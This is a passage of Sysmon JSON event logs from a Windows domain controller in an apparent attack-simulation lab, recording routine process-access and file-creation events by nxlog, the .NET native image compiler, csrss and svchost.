{"EventTime":"2020-08-01 07:01:30","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8095,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:30.638\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:30.638","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:01:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:31","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8096,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:01:31.607\r\nProcessGuid: {E2A3D6B1-1347-5F25-0000-0010F9E30D00}\r\nProcessId: 2616\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\a38-0\\System.Activities.dll\r\nCreationUtcTime: 2020-08-01 07:01:31.607","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:01:31.607","ProcessGuid":"{E2A3D6B1-1347-5F25-0000-0010F9E30D00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\a38-0\\System.Activities.dll","CreationUtcTime":"2020-08-01 07:01:31.607","EventReceivedTime":"2020-08-01 07:01:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:31","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8097,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:31.638\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:31.638","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:01:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:31","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8098,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:31.716\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-134B-5F25-0000-0010F8EB0D00}\r\nTargetProcessId: 4936\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:31.716","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-134B-5F25-0000-0010F8EB0D00}","TargetProcessId":"4936","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:31","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8099,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:31.716\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-134B-5F25-0000-0010F8EB0D00}\r\nTargetProcessId: 4936\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:31.716","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-134B-5F25-0000-0010F8EB0D00}","TargetProcessId":"4936","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:31","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8100,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:31.732\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-134B-5F25-0000-0010F8EB0D00}\r\nTargetProcessId: 4936\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:31.732","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-134B-5F25-0000-0010F8EB0D00}","TargetProcessId":"4936","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:32","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8101,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:32.185\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1335-5F25-0000-001084040C00}\r\nTargetProcessId: 1292\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:32.185","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1335-5F25-0000-001084040C00}","TargetProcessId":"1292","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:32","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8102,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:32.185\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1335-5F25-0000-001084040C00}\r\nTargetProcessId: 1292\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:32.185","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1335-5F25-0000-001084040C00}","TargetProcessId":"1292","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:32","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8103,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:32.201\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-134C-5F25-0000-001003F10D00}\r\nTargetProcessId: 1292\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 